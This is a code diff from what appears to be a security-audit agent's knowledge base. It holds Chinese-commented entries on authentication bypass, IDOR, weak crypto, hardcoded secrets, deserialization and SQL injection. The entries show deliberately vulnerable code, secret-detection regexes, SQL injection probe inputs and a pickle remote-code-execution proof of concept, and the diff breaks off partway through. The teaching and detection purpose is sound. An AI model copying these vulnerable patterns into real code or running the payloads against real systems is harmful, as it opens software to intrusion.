tags_lower = [t.lower() for t in tags]
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
doc_tags_lower = [t.lower() for t in doc.tags]
|
||||
if any(tag in doc_tags_lower for tag in tags_lower):
|
||||
results.append(doc.to_dict())
|
||||
|
||||
return results
|
||||
|
||||
def get_knowledge_stats(self) -> Dict[str, Any]:
|
||||
"""获取知识库统计信息"""
|
||||
stats = {
|
||||
"total": len(self._builtin_knowledge),
|
||||
"by_category": {},
|
||||
"by_severity": {},
|
||||
}
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
cat = doc.category.value
|
||||
stats["by_category"][cat] = stats["by_category"].get(cat, 0) + 1
|
||||
|
||||
if doc.severity:
|
||||
sev = doc.severity
|
||||
stats["by_severity"][sev] = stats["by_severity"].get(sev, 0) + 1
|
||||
|
||||
return stats
|
||||
|
||||
|
||||
# 全局实例
|
||||
security_knowledge_rag = SecurityKnowledgeRAG()
|
||||
|
|
@ -0,0 +1,257 @@
|
|||
"""
|
||||
知识查询工具 - 让Agent可以在运行时查询安全知识
|
||||
|
||||
基于RAG的知识检索工具
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import Dict, Any, Optional, List, Type
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from ..tools.base import AgentTool, ToolResult
|
||||
from .rag_knowledge import security_knowledge_rag, KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SecurityKnowledgeQueryInput(BaseModel):
|
||||
"""安全知识查询输入"""
|
||||
query: str = Field(..., description="搜索查询,如漏洞类型、技术名称、安全概念等")
|
||||
category: Optional[str] = Field(
|
||||
None,
|
||||
description="知识类别过滤: vulnerability, best_practice, remediation, code_pattern, compliance"
|
||||
)
|
||||
top_k: int = Field(3, description="返回结果数量", ge=1, le=10)
|
||||
|
||||
|
||||
class SecurityKnowledgeQueryTool(AgentTool):
|
||||
"""
|
||||
安全知识查询工具
|
||||
|
||||
用于查询安全漏洞知识、最佳实践、修复建议等
|
||||
"""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "query_security_knowledge"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """查询安全知识库,获取漏洞类型、检测方法、修复建议等专业知识。
|
||||
|
||||
使用场景:
|
||||
- 需要了解某种漏洞类型的详细信息
|
||||
- 查找安全最佳实践
|
||||
- 获取修复建议
|
||||
- 了解特定技术的安全考量
|
||||
|
||||
示例查询:
|
||||
- "SQL injection detection methods"
|
||||
- "XSS prevention best practices"
|
||||
- "SSRF vulnerability patterns"
|
||||
- "hardcoded credentials"
|
||||
"""
|
||||
|
||||
@property
|
||||
def args_schema(self) -> Type[BaseModel]:
|
||||
return SecurityKnowledgeQueryInput
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
query: str,
|
||||
category: Optional[str] = None,
|
||||
top_k: int = 3,
|
||||
) -> ToolResult:
|
||||
"""执行知识查询"""
|
||||
try:
|
||||
# 转换类别
|
||||
knowledge_category = None
|
||||
if category:
|
||||
try:
|
||||
knowledge_category = KnowledgeCategory(category.lower())
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
# 执行搜索
|
||||
results = await security_knowledge_rag.search(
|
||||
query=query,
|
||||
category=knowledge_category,
|
||||
top_k=top_k,
|
||||
)
|
||||
|
||||
if not results:
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data="未找到相关的安全知识。请尝试使用不同的关键词。",
|
||||
metadata={"query": query, "results_count": 0},
|
||||
)
|
||||
|
||||
# 格式化结果
|
||||
formatted_results = []
|
||||
for i, result in enumerate(results, 1):
|
||||
formatted = f"### 结果 {i}"
|
||||
if result.get("title"):
|
||||
formatted += f": {result['title']}"
|
||||
formatted += f"\n相关度: {result.get('score', 0):.2f}\n"
|
||||
if result.get("tags"):
|
||||
formatted += f"标签: {', '.join(result['tags'])}\n"
|
||||
if result.get("cwe_ids"):
|
||||
formatted += f"CWE: {', '.join(result['cwe_ids'])}\n"
|
||||
formatted += f"\n{result.get('content', '')}"
|
||||
formatted_results.append(formatted)
|
||||
|
||||
output = f"找到 {len(results)} 条相关知识:\n\n" + "\n\n---\n\n".join(formatted_results)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data=output,
|
||||
metadata={
|
||||
"query": query,
|
||||
"results_count": len(results),
|
||||
"results": results,
|
||||
},
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Knowledge query failed: {e}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"知识查询失败: {str(e)}",
|
||||
)
|
||||
|
||||
|
||||
class VulnerabilityKnowledgeInput(BaseModel):
|
||||
"""漏洞知识查询输入"""
|
||||
vulnerability_type: str = Field(
|
||||
...,
|
||||
description="漏洞类型,如: sql_injection, xss, command_injection, path_traversal, ssrf, deserialization, hardcoded_secrets, auth_bypass"
|
||||
)
|
||||
|
||||
|
||||
class GetVulnerabilityKnowledgeTool(AgentTool):
|
||||
"""
|
||||
获取特定漏洞类型的完整知识
|
||||
|
||||
返回该漏洞类型的检测方法、危险模式、修复建议等完整信息
|
||||
"""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "get_vulnerability_knowledge"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return """获取特定漏洞类型的完整专业知识。
|
||||
|
||||
支持的漏洞类型:
|
||||
- sql_injection: SQL注入
|
||||
- xss: 跨站脚本攻击
|
||||
- command_injection: 命令注入
|
||||
- path_traversal: 路径遍历
|
||||
- ssrf: 服务端请求伪造
|
||||
- deserialization: 不安全的反序列化
|
||||
- hardcoded_secrets: 硬编码凭证
|
||||
- auth_bypass: 认证绕过
|
||||
|
||||
返回内容包括:
|
||||
- 漏洞概述和危害
|
||||
- 危险代码模式
|
||||
- 检测方法
|
||||
- 安全实践
|
||||
- 修复示例
|
||||
"""
|
||||
|
||||
@property
|
||||
def args_schema(self) -> Type[BaseModel]:
|
||||
return VulnerabilityKnowledgeInput
|
||||
|
||||
async def _execute(self, vulnerability_type: str) -> ToolResult:
|
||||
"""获取漏洞知识"""
|
||||
try:
|
||||
knowledge = await security_knowledge_rag.get_vulnerability_knowledge(
|
||||
vulnerability_type
|
||||
)
|
||||
|
||||
if not knowledge:
|
||||
available = security_knowledge_rag.get_all_vulnerability_types()
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data=f"未找到漏洞类型 '{vulnerability_type}' 的知识。\n\n可用的漏洞类型: {', '.join(available)}",
|
||||
metadata={"available_types": available},
|
||||
)
|
||||
|
||||
# 格式化输出
|
||||
output_parts = [
|
||||
f"# {knowledge.get('title', vulnerability_type)}",
|
||||
f"严重程度: {knowledge.get('severity', 'N/A')}",
|
||||
]
|
||||
|
||||
if knowledge.get("cwe_ids"):
|
||||
output_parts.append(f"CWE: {', '.join(knowledge['cwe_ids'])}")
|
||||
if knowledge.get("owasp_ids"):
|
||||
output_parts.append(f"OWASP: {', '.join(knowledge['owasp_ids'])}")
|
||||
|
||||
output_parts.append("")
|
||||
output_parts.append(knowledge.get("content", ""))
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data="\n".join(output_parts),
|
||||
metadata=knowledge,
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Get vulnerability knowledge failed: {e}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"获取漏洞知识失败: {str(e)}",
|
||||
)
|
||||
|
||||
|
||||
class ListKnowledgeModulesInput(BaseModel):
|
||||
"""列出知识模块输入"""
|
||||
category: Optional[str] = Field(
|
||||
None,
|
||||
description="按类别过滤: vulnerability, best_practice, remediation"
|
||||
)
|
||||
|
||||
|
||||
class ListKnowledgeModulesTool(AgentTool):
|
||||
"""
|
||||
列出所有可用的知识模块
|
||||
"""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "list_knowledge_modules"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return "列出所有可用的安全知识模块,包括漏洞类型、最佳实践等"
|
||||
|
||||
@property
|
||||
def args_schema(self) -> Type[BaseModel]:
|
||||
return ListKnowledgeModulesInput
|
||||
|
||||
async def _execute(self, category: Optional[str] = None) -> ToolResult:
|
||||
"""列出知识模块"""
|
||||
try:
|
||||
modules = security_knowledge_rag.get_all_vulnerability_types()
|
||||
|
||||
output = "可用的安全知识模块:\n\n"
|
||||
output += "## 漏洞类型\n"
|
||||
for module in modules:
|
||||
output += f"- {module}\n"
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data=output,
|
||||
metadata={"modules": modules},
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"List knowledge modules failed: {e}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"列出知识模块失败: {str(e)}",
|
||||
)
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
"""
|
||||
漏洞类型知识模块
|
||||
|
||||
包含各种漏洞类型的专业知识
|
||||
"""
|
||||
|
||||
from .injection import SQL_INJECTION, NOSQL_INJECTION, COMMAND_INJECTION, CODE_INJECTION
|
||||
from .xss import XSS_REFLECTED, XSS_STORED, XSS_DOM
|
||||
from .auth import AUTH_BYPASS, IDOR, BROKEN_ACCESS_CONTROL
|
||||
from .crypto import WEAK_CRYPTO, HARDCODED_SECRETS
|
||||
from .ssrf import SSRF
|
||||
from .deserialization import INSECURE_DESERIALIZATION
|
||||
from .path_traversal import PATH_TRAVERSAL
|
||||
from .xxe import XXE
|
||||
from .race_condition import RACE_CONDITION
|
||||
|
||||
# 所有漏洞知识文档
|
||||
ALL_VULNERABILITY_DOCS = [
|
||||
# 注入类
|
||||
SQL_INJECTION,
|
||||
NOSQL_INJECTION,
|
||||
COMMAND_INJECTION,
|
||||
CODE_INJECTION,
|
||||
# XSS类
|
||||
XSS_REFLECTED,
|
||||
XSS_STORED,
|
||||
XSS_DOM,
|
||||
# 认证授权类
|
||||
AUTH_BYPASS,
|
||||
IDOR,
|
||||
BROKEN_ACCESS_CONTROL,
|
||||
# 加密类
|
||||
WEAK_CRYPTO,
|
||||
HARDCODED_SECRETS,
|
||||
# 其他
|
||||
SSRF,
|
||||
INSECURE_DESERIALIZATION,
|
||||
PATH_TRAVERSAL,
|
||||
XXE,
|
||||
RACE_CONDITION,
|
||||
]
|
||||
|
||||
__all__ = [
|
||||
"ALL_VULNERABILITY_DOCS",
|
||||
"SQL_INJECTION",
|
||||
"NOSQL_INJECTION",
|
||||
"COMMAND_INJECTION",
|
||||
"CODE_INJECTION",
|
||||
"XSS_REFLECTED",
|
||||
"XSS_STORED",
|
||||
"XSS_DOM",
|
||||
"AUTH_BYPASS",
|
||||
"IDOR",
|
||||
"BROKEN_ACCESS_CONTROL",
|
||||
"WEAK_CRYPTO",
|
||||
"HARDCODED_SECRETS",
|
||||
"SSRF",
|
||||
"INSECURE_DESERIALIZATION",
|
||||
"PATH_TRAVERSAL",
|
||||
"XXE",
|
||||
"RACE_CONDITION",
|
||||
]
|
||||
|
|
@ -0,0 +1,231 @@
|
|||
"""
|
||||
认证和授权漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
AUTH_BYPASS = KnowledgeDocument(
|
||||
id="vuln_auth_bypass",
|
||||
title="Authentication Bypass",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["authentication", "bypass", "login", "session", "jwt"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-287", "CWE-306"],
|
||||
owasp_ids=["A07:2021"],
|
||||
content="""
|
||||
认证绕过允许攻击者在不提供有效凭证的情况下访问系统。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### JWT验证缺失
|
||||
```python
|
||||
# 危险 - 不验证签名
|
||||
jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
# 危险 - 允许none算法
|
||||
jwt.decode(token, algorithms=["HS256", "none"])
|
||||
|
||||
# 危险 - 弱密钥
|
||||
jwt.encode(payload, "secret", algorithm="HS256")
|
||||
```
|
||||
|
||||
### 会话管理问题
|
||||
```python
|
||||
# 危险 - 可预测的会话ID
|
||||
session_id = str(user_id)
|
||||
session_id = hashlib.md5(username.encode()).hexdigest()
|
||||
|
||||
# 危险 - 会话固定
|
||||
session['user'] = user # 登录后未重新生成session
|
||||
```
|
||||
|
||||
### 认证逻辑缺陷
|
||||
```python
|
||||
# 危险 - 逻辑绕过
|
||||
if user.is_admin or request.args.get('admin') == 'true':
|
||||
return admin_panel()
|
||||
|
||||
# 危险 - 默认凭证
|
||||
if username == "admin" and password == "admin":
|
||||
return login_success()
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. JWT的算法和签名验证
|
||||
2. 会话ID的随机性
|
||||
3. 登录后是否重新生成会话
|
||||
4. 认证逻辑的完整性
|
||||
5. 默认/硬编码凭证
|
||||
|
||||
## 安全实践
|
||||
1. 强制验证JWT签名
|
||||
2. 使用强随机会话ID
|
||||
3. 登录后重新生成会话
|
||||
4. 多因素认证
|
||||
5. 账户锁定机制
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 正确验证JWT
|
||||
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
|
||||
|
||||
# 安全 - 登录后重新生成会话
|
||||
session.regenerate()
|
||||
session['user_id'] = user.id
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
IDOR = KnowledgeDocument(
|
||||
id="vuln_idor",
|
||||
title="Insecure Direct Object Reference (IDOR)",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["idor", "authorization", "access-control", "bola"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-639"],
|
||||
owasp_ids=["A01:2021"],
|
||||
content="""
|
||||
IDOR(不安全的直接对象引用)允许攻击者通过修改参数访问其他用户的数据。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### 直接使用用户输入的ID
|
||||
```python
|
||||
# 危险 - 无权限检查
|
||||
@app.route('/api/user/<user_id>')
|
||||
def get_user(user_id):
|
||||
return User.query.get(user_id).to_dict()
|
||||
|
||||
# 危险 - 文件访问
|
||||
@app.route('/download/<file_id>')
|
||||
def download(file_id):
|
||||
return send_file(f"/uploads/{file_id}")
|
||||
```
|
||||
|
||||
### API端点
|
||||
```python
|
||||
# 危险
|
||||
GET /api/orders/12345 # 可以改成其他订单ID
|
||||
GET /api/users/100/profile
|
||||
DELETE /api/documents/999
|
||||
```
|
||||
|
||||
## 攻击方式
|
||||
1. 递增/递减ID值
|
||||
2. 使用其他用户的ID
|
||||
3. 批量枚举
|
||||
4. 参数污染
|
||||
|
||||
## 检测要点
|
||||
1. 检查所有使用ID参数的端点
|
||||
2. 验证是否有权限检查
|
||||
3. 检查是否验证资源所有权
|
||||
4. 关注批量操作接口
|
||||
|
||||
## 安全实践
|
||||
1. 始终验证资源所有权
|
||||
2. 使用UUID代替自增ID
|
||||
3. 实现基于角色的访问控制
|
||||
4. 记录访问日志
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 验证所有权
|
||||
@app.route('/api/user/<user_id>')
|
||||
@login_required
|
||||
def get_user(user_id):
|
||||
user = User.query.get(user_id)
|
||||
if user.id != current_user.id and not current_user.is_admin:
|
||||
abort(403)
|
||||
return user.to_dict()
|
||||
|
||||
# 安全 - 使用当前用户上下文
|
||||
@app.route('/api/profile')
|
||||
@login_required
|
||||
def get_profile():
|
||||
return current_user.to_dict()
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
BROKEN_ACCESS_CONTROL = KnowledgeDocument(
|
||||
id="vuln_broken_access_control",
|
||||
title="Broken Access Control",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["access-control", "authorization", "privilege", "rbac"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-284", "CWE-285"],
|
||||
owasp_ids=["A01:2021"],
|
||||
content="""
|
||||
访问控制失效允许用户执行超出其权限的操作。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### 缺少权限检查
|
||||
```python
|
||||
# 危险 - 管理功能无权限验证
|
||||
@app.route('/admin/delete_user/<user_id>')
|
||||
def delete_user(user_id):
|
||||
User.query.get(user_id).delete()
|
||||
return "Deleted"
|
||||
|
||||
# 危险 - 仅前端隐藏
|
||||
# 前端隐藏了按钮,但API无保护
|
||||
```
|
||||
|
||||
### 权限提升
|
||||
```python
|
||||
# 危险 - 可修改角色
|
||||
@app.route('/api/user/update', methods=['POST'])
|
||||
def update_user():
|
||||
user = current_user
|
||||
user.role = request.json.get('role') # 用户可自己提升权限
|
||||
db.commit()
|
||||
```
|
||||
|
||||
### 水平越权
|
||||
```python
|
||||
# 危险 - 可访问其他用户数据
|
||||
@app.route('/api/orders')
|
||||
def get_orders():
|
||||
user_id = request.args.get('user_id') # 可指定任意用户
|
||||
return Order.query.filter_by(user_id=user_id).all()
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 所有敏感操作是否有权限检查
|
||||
2. 权限检查是否在服务端
|
||||
3. 是否可以修改自己的权限
|
||||
4. 是否可以访问其他用户的资源
|
||||
|
||||
## 安全实践
|
||||
1. 默认拒绝所有访问
|
||||
2. 服务端强制权限检查
|
||||
3. 使用RBAC/ABAC
|
||||
4. 记录所有访问尝试
|
||||
5. 定期审计权限配置
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 装饰器检查权限
|
||||
@app.route('/admin/delete_user/<user_id>')
|
||||
@login_required
|
||||
@admin_required
|
||||
def delete_user(user_id):
|
||||
User.query.get(user_id).delete()
|
||||
return "Deleted"
|
||||
|
||||
# 安全 - 白名单可修改字段
|
||||
ALLOWED_FIELDS = ['name', 'email', 'avatar']
|
||||
@app.route('/api/user/update', methods=['POST'])
|
||||
@login_required
|
||||
def update_user():
|
||||
for field in request.json:
|
||||
if field in ALLOWED_FIELDS:
|
||||
setattr(current_user, field, request.json[field])
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,163 @@
|
|||
"""
|
||||
加密相关漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
WEAK_CRYPTO = KnowledgeDocument(
|
||||
id="vuln_weak_crypto",
|
||||
title="Weak Cryptography",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["crypto", "encryption", "hash", "md5", "sha1"],
|
||||
severity="medium",
|
||||
cwe_ids=["CWE-327", "CWE-328"],
|
||||
owasp_ids=["A02:2021"],
|
||||
content="""
|
||||
使用弱加密算法或不当的加密实现可能导致数据泄露。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### 弱哈希算法
|
||||
```python
|
||||
# 危险 - MD5/SHA1用于密码
|
||||
password_hash = hashlib.md5(password.encode()).hexdigest()
|
||||
password_hash = hashlib.sha1(password.encode()).hexdigest()
|
||||
|
||||
# 危险 - 无盐哈希
|
||||
hash = hashlib.sha256(password.encode()).hexdigest()
|
||||
```
|
||||
|
||||
### 弱加密算法
|
||||
```python
|
||||
# 危险 - DES/3DES
|
||||
from Crypto.Cipher import DES
|
||||
cipher = DES.new(key, DES.MODE_ECB)
|
||||
|
||||
# 危险 - ECB模式
|
||||
cipher = AES.new(key, AES.MODE_ECB)
|
||||
|
||||
# 危险 - 弱密钥
|
||||
key = "12345678" # 短密钥
|
||||
key = password.encode()[:16] # 从密码派生
|
||||
```
|
||||
|
||||
### 不安全的随机数
|
||||
```python
|
||||
# 危险 - 使用random模块
|
||||
import random
|
||||
token = ''.join(random.choices(string.ascii_letters, k=32))
|
||||
session_id = random.randint(0, 999999)
|
||||
```
|
||||
|
||||
## 检测关键词
|
||||
- md5, sha1, des, 3des, rc4
|
||||
- MODE_ECB
|
||||
- random.random, random.randint
|
||||
- 硬编码的密钥/IV
|
||||
|
||||
## 安全实践
|
||||
1. 密码使用bcrypt/argon2/scrypt
|
||||
2. 加密使用AES-256-GCM
|
||||
3. 使用secrets模块生成随机数
|
||||
4. 使用KDF派生密钥
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 密码哈希
|
||||
import bcrypt
|
||||
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
|
||||
|
||||
# 安全 - 加密
|
||||
from cryptography.fernet import Fernet
|
||||
key = Fernet.generate_key()
|
||||
cipher = Fernet(key)
|
||||
|
||||
# 安全 - 随机数
|
||||
import secrets
|
||||
token = secrets.token_urlsafe(32)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
HARDCODED_SECRETS = KnowledgeDocument(
|
||||
id="vuln_hardcoded_secrets",
|
||||
title="Hardcoded Secrets",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["secrets", "password", "credentials", "api-key", "token", "leak"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-798", "CWE-259"],
|
||||
owasp_ids=["A07:2021"],
|
||||
content="""
|
||||
硬编码的凭证可能被攻击者从源代码、日志或配置文件中提取。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### 硬编码密码
|
||||
```python
|
||||
# 危险
|
||||
password = "admin123"
|
||||
db_password = "P@ssw0rd!"
|
||||
root_password = "toor"
|
||||
```
|
||||
|
||||
### 硬编码API密钥
|
||||
```python
|
||||
# 危险
|
||||
api_key = "sk-1234567890abcdef"
|
||||
aws_access_key = "AKIAIOSFODNN7EXAMPLE"
|
||||
stripe_key = "sk_live_xxxxx"
|
||||
github_token = "ghp_xxxxxxxxxxxx"
|
||||
```
|
||||
|
||||
### 硬编码连接字符串
|
||||
```python
|
||||
# 危险
|
||||
connection_string = "mysql://root:password@localhost/db"
|
||||
redis_url = "redis://:password@localhost:6379"
|
||||
mongodb_uri = "mongodb://admin:pass@localhost:27017"
|
||||
```
|
||||
|
||||
### 配置文件中的密钥
|
||||
```yaml
|
||||
# 危险 - config.yaml
|
||||
database:
|
||||
password: "secret123"
|
||||
jwt:
|
||||
secret: "my-jwt-secret"
|
||||
```
|
||||
|
||||
## 检测正则
|
||||
```regex
|
||||
# API Keys
|
||||
(api[_-]?key|apikey)['\"]?\\s*[:=]\\s*['\"][a-zA-Z0-9]{16,}['\"]
|
||||
# AWS Keys
|
||||
AKIA[0-9A-Z]{16}
|
||||
# Private Keys
|
||||
-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----
|
||||
# JWT Secrets
|
||||
(jwt[_-]?secret|secret[_-]?key)['\"]?\\s*[:=]\\s*['\"][^'\"]+['\"]
|
||||
```
|
||||
|
||||
## 安全实践
|
||||
1. 使用环境变量
|
||||
2. 使用密钥管理服务(AWS Secrets Manager, HashiCorp Vault)
|
||||
3. 使用.gitignore排除敏感文件
|
||||
4. 使用git-secrets防止提交
|
||||
5. 定期轮换密钥
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 环境变量
|
||||
import os
|
||||
password = os.environ.get("DB_PASSWORD")
|
||||
api_key = os.environ.get("API_KEY")
|
||||
|
||||
# 安全 - 配置文件引用环境变量
|
||||
# config.yaml
|
||||
database:
|
||||
password: ${DB_PASSWORD}
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,119 @@
|
|||
"""
|
||||
反序列化漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
INSECURE_DESERIALIZATION = KnowledgeDocument(
|
||||
id="vuln_deserialization",
|
||||
title="Insecure Deserialization",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["deserialization", "pickle", "yaml", "json", "object", "rce"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-502"],
|
||||
owasp_ids=["A08:2021"],
|
||||
content="""
|
||||
不安全的反序列化可能导致远程代码执行、拒绝服务或权限提升。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python Pickle
|
||||
```python
|
||||
# 危险 - 反序列化不可信数据
|
||||
import pickle
|
||||
data = pickle.loads(user_data)
|
||||
data = pickle.load(open(user_file, 'rb'))
|
||||
|
||||
# 危险 - 通过网络接收
|
||||
data = pickle.loads(request.data)
|
||||
```
|
||||
|
||||
### Python YAML
|
||||
```python
|
||||
# 危险 - 不安全的yaml.load
|
||||
import yaml
|
||||
data = yaml.load(user_input) # 不带Loader参数
|
||||
data = yaml.load(user_input, Loader=yaml.Loader) # 不安全的Loader
|
||||
```
|
||||
|
||||
### Python Marshal
|
||||
```python
|
||||
# 危险
|
||||
import marshal
|
||||
code = marshal.loads(user_data)
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 危险 - ObjectInputStream
|
||||
ObjectInputStream ois = new ObjectInputStream(userInput);
|
||||
Object obj = ois.readObject();
|
||||
|
||||
// 危险 - XMLDecoder
|
||||
XMLDecoder decoder = new XMLDecoder(userInput);
|
||||
Object obj = decoder.readObject();
|
||||
```
|
||||
|
||||
### PHP
|
||||
```php
|
||||
// 危险
|
||||
$data = unserialize($_POST['data']);
|
||||
```
|
||||
|
||||
### Node.js
|
||||
```javascript
|
||||
// 危险 - node-serialize
|
||||
var serialize = require('node-serialize');
|
||||
var obj = serialize.unserialize(userInput);
|
||||
```
|
||||
|
||||
## 攻击原理
|
||||
```python
|
||||
# Pickle RCE示例
|
||||
import pickle
|
||||
import os
|
||||
|
||||
class Exploit:
|
||||
def __reduce__(self):
|
||||
return (os.system, ('id',))
|
||||
|
||||
payload = pickle.dumps(Exploit())
|
||||
# 反序列化时执行os.system('id')
|
||||
```
|
||||
|
||||
## 检测要点
|
||||
1. 搜索pickle.loads, yaml.load, unserialize
|
||||
2. 检查数据来源是否可信
|
||||
3. 检查是否有签名验证
|
||||
4. 关注网络接收的序列化数据
|
||||
|
||||
## 安全实践
|
||||
1. 避免反序列化不可信数据
|
||||
2. 使用安全的序列化格式(JSON)
|
||||
3. 使用yaml.safe_load()
|
||||
4. 实现完整性检查(HMAC签名)
|
||||
5. 使用白名单限制可反序列化的类
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 使用JSON
|
||||
import json
|
||||
data = json.loads(user_input)
|
||||
|
||||
# 安全 - 使用safe_load
|
||||
import yaml
|
||||
data = yaml.safe_load(user_input)
|
||||
|
||||
# 安全 - 签名验证
|
||||
import hmac
|
||||
import pickle
|
||||
|
||||
def safe_loads(data, signature, key):
|
||||
expected_sig = hmac.new(key, data, 'sha256').hexdigest()
|
||||
if not hmac.compare_digest(signature, expected_sig):
|
||||
raise ValueError("Invalid signature")
|
||||
return pickle.loads(data)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,273 @@
|
|||
"""
|
||||
注入类漏洞知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
SQL_INJECTION = KnowledgeDocument(
|
||||
id="vuln_sql_injection",
|
||||
title="SQL Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["sql", "injection", "database", "input-validation", "sqli"],
|
||||
severity="critical",
|
||||
cwe_ids=["CWE-89"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
SQL注入是一种代码注入技术,攻击者通过在应用程序查询中插入恶意SQL代码来操纵数据库。
|
||||
|
||||
## 危险模式
|
||||
|
||||
### Python
|
||||
```python
|
||||
# 危险 - 字符串拼接
|
||||
query = "SELECT * FROM users WHERE id = " + user_id
|
||||
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
|
||||
query = "SELECT * FROM users WHERE id = %s" % user_id
|
||||
|
||||
# 危险 - ORM原始查询
|
||||
User.objects.raw(f"SELECT * FROM users WHERE name = '{name}'")
|
||||
db.execute(text(f"SELECT * FROM users WHERE id = {user_id}"))
|
||||
```
|
||||
|
||||
### JavaScript/Node.js
|
||||
```javascript
|
||||
// 危险
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`;
|
||||
connection.query("SELECT * FROM users WHERE name = '" + name + "'");
|
||||
```
|
||||
|
||||
### Java
|
||||
```java
|
||||
// 危险
|
||||
String query = "SELECT * FROM users WHERE id = " + userId;
|
||||
Statement stmt = conn.createStatement();
|
||||
stmt.executeQuery(query);
|
||||
```
|
||||
|
||||
## 检测关键词
|
||||
- execute, query, raw, cursor
|
||||
- SELECT, INSERT, UPDATE, DELETE
|
||||
- 字符串拼接 (+, f-string, format, %)
|
||||
- WHERE, AND, OR 后跟变量
|
||||
|
||||
## 安全实践
|
||||
1. 使用参数化查询/预编译语句
|
||||
2. 使用ORM框架的安全API
|
||||
3. 输入验证和类型检查
|
||||
4. 最小权限原则
|
||||
5. 使用存储过程
|
||||
|
||||
## 修复示例
|
||||
```python
|
||||
# 安全 - 参数化查询
|
||||
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
|
||||
|
||||
# 安全 - ORM
|
||||
User.objects.filter(id=user_id)
|
||||
|
||||
# 安全 - SQLAlchemy
|
||||
db.query(User).filter(User.id == user_id)
|
||||
```
|
||||
|
||||
## 验证方法
|
||||
1. 尝试单引号 ' 触发语法错误
|
||||
2. 使用 OR 1=1 测试布尔注入
|
||||
3. 使用 SLEEP() 测试时间盲注
|
||||
4. 检查错误信息是否泄露数据库信息
|
||||
""",
|
||||
)
|
||||
|
||||
|
||||
NOSQL_INJECTION = KnowledgeDocument(
|
||||
id="vuln_nosql_injection",
|
||||
title="NoSQL Injection",
|
||||
category=KnowledgeCategory.VULNERABILITY,
|
||||
tags=["nosql", "mongodb", "injection", "database"],
|
||||
severity="high",
|
||||
cwe_ids=["CWE-943"],
|
||||
owasp_ids=["A03:2021"],
|
||||
content="""
|
||||
